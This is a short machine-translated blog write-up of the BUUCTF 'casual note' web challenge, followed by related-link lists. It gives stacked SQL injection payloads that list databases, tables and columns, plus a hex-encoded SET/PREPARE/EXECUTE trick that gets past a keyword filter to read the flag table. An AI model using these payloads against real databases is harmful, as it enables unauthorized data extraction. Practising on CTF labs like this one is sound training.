buuctf brush Tour title -web- casual note

Others 2020-02-23 19:10:16 views: null

Open Environment

Follow the prompts should be sql injection

Check the database name, and data tables

1';show databases;#

1';show tables;#

Check the fields of the table (1 '; desc `1919810931114514`; #)

Keyword discovery flag, query

After filtration injection found

The following code found during the injection

Thus the use of a combination set and prepare, using bypass select bypass authentication hexadecimal

Hexadecimal ( the SELECT * from 1919810931114514` ),

Payload structure is as follows

1';SeT@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

Successfully got flag

Guess you like

Origin www.cnblogs.com/anweilx/p/12353174.html

buuctf brush Tour title -web- casual note

[Web] BUUCTF- casual note

noi brush winter tour title

BUUCTF internet -web- side recording side brush -1

Brush Tour title on 14 points, CTFshow miscx

buuctf brush title record geeks challenge lovesql

BUUCTF brush title records REAL classes

Brush Tour title on 13 points, CTFshow misc30 rar

Brush Tour title on 11 points, ctfshow misc40

buuctf щетка Tour названия -web- случайных нот

Brush title Note: The minimum number arranged in an array (C ++ && python)

GLZ free form of title LeetCode brush Note 3

BUUCTF WEB (2020-April to brush questions~)

Tour title brush station 8, DVWA XSS stored (low, medium, high)

Brush Tour title on 15 points, CTFshow misc30 love mp3

Tour title brush station 7, DVWA XSS reflect (low, medium, high)

BUUCTF [2020 Chinese New Year red envelopes title] 1 web

LeetCode brush under a right node pointer 116. Note title fill each node

LeetCode front brush 105. Note title sequence and structure binary sequence preorder

LeetCode brush under a right node 117. Note title fill each node pointer II

BUUCTF-[Strong Tennis Cup 2019] Casual Bet

BUUCTF platform -web- (kzone + admin + hideandseek) Record

Brush title experience program title

Brush algorithm title title plan

bugku.ctf brush title report WEB direction

Advanced web world offensive and defensive zone brush title record

The third question-[强网杯2019] casual note

Casual but not casual

Brush title or source link

Brush title Two Sum

Recommended

The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!

Ranking

Getting the basic concepts of ROS + catkin Profile

Spring Learning (2) --- Assembling Beans in the IoC Container

js to get the src attribute of the image regularly

STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud

Short video learning - 3, pandas simple use of pivot_table

Print directory of project configuration log, output log

Understand the difference between vi and vim in Linux in 3 minutes

1 + x certificate Web front-end development HTML5 special exercises

mangodb save and insert the difference

7-1 Family tree processing (50 points) (binary tree solution)

Daily

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)